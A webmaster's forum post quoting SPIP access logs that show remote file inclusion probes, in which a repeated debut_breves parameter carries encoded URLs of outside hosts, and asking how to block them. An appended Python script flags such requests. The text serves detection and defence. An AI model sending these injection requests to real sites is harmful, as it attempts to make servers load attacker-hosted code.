Hello,
For some time now, I have been coming across suspicious logs on one of my sites built with SPIP
(best viewed on a wide screen)
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10536 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10515 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:01 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10540 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
What worries me is the ASCII codes that replace the / and : characters.
Sometimes I get URLs three kilometres long, with attempts at code and URL injection.
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:32 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11315 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:33 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11316 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:34 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
What should I make of this activity, given that if I type this URL into my browser's address bar, I get nothing unusual, just the corresponding article (code 200)?
Is there a way to fend off this activity, with .htaccess, a rewrite rule, or I don't know what...
Thank you for your attention.
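
An added example, not part of the original post and not SPIP code: a log scan that flags the two traits visible in the lines above, one parameter sent several times in the same request and a percent-encoded absolute URL among its values. The sample lines are constructed with placeholder example.test hosts, and the function names are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in the same layout as the post's logs (placeholder hosts).
SAMPLE_LOG = '''\
client.example.test www.example.test - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fremote.example.test%2Fa%2Fb%2F&debut_breves=5 HTTP/1.0" 200 10536 "-" "Mozilla/4.0"
client.example.test www.example.test - [04/Mar/2008:00:40:00 +0100] "GET /spip.php?breve2&debut_breves=5 HTTP/1.0" 200 10200 "-" "Mozilla/4.0"
'''

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
URL_VALUE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def inspect_request(target):
    """Return (reason, parameter, detail) findings for one request target."""
    values = defaultdict(list)
    query = urlsplit(target).query
    # parse_qsl percent-decodes each value, so %3A and %2F come back as ':' and '/'.
    for name, value in parse_qsl(query, keep_blank_values=True):
        values[name].append(value)
    findings = []
    for name, vals in values.items():
        if len(vals) > 1:
            findings.append(("repeated-parameter", name, str(len(vals))))
        for value in vals:
            if URL_VALUE_RE.match(value):
                findings.append(("url-in-value", name, value))
    return findings


def scan(log_text):
    """Return [(line_number, findings)] for every log line with a finding."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = inspect_request(match.group(1))
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same two conditions (a duplicated parameter, a value that decodes to a URL) are what a server-side filter would match on before the request reaches the application.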